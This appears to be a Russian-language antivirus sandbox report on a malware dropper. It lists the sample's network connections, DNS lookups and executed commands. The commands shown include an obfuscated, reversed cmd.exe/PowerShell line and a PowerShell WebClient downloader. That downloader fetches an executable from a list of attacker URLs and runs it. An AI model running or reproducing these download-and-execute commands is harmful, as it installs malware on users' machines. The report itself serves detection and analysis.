Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:O/C"set wfzh=;'WDE'=PqE$}}{hctac}};kaerb;'fwf'=ZWo$;Cpk$ metI-ekovnI{ )00008 eg- htgnel.)Cpk$ metI-teG(( fI;'NfZ'=HHZ$;)Cpk$ ,Fvp$(eliFdaolnwoD.zNL${yrt{)rXI$ ni Fvp$(hcaerof;'exe.'+dvZ$+'\'...
Сетевая активность
Подключается к
- 'ar#####.suipianny.com':80
- 'st###-castle.ir':80
- 'st###-castle.ir':443
TCP
Запросы HTTP GET
- http://ar#####.suipianny.com/SbG
- http://st###-castle.ir/8WzsCrw
Другие
- 'st###-castle.ir':443
UDP
- DNS ASK al###sazan.com
- DNS ASK ws#####s.msolsales3.com
- DNS ASK ar#####.suipianny.com
- DNS ASK in########moscraciunconstanta.ro
- DNS ASK st###-castle.ir
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set wfzh=;'WDE'=PqE$}}{hctac}};kaerb;'fwf'=ZWo$;Cpk$ metI-ekovnI{ )00008 eg- htgnel.)Cpk$ metI-teG(( fI;'NfZ'=HHZ$;)Cpk$ ,Fvp$(eliFdaolnwoD.zNL${yrt{)rXI$ ni Fvp$(hcaerof;'exe.'+dvZ$+'\'...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $Zmj='Jco';$LNz=new-object Net.WebClient;$IXr='http://www.al###sazan.com/sA@http://wssports.msolsales3.com/YAi@http://article.suipianny.com/SbG@https://inchirieremoscr...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=3 delims=JZ.Mzt" %a IN ('assoc.psm1') DO %a -"
- '<SYSTEM32>\cmd.exe' /c assoc.psm1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =Jco
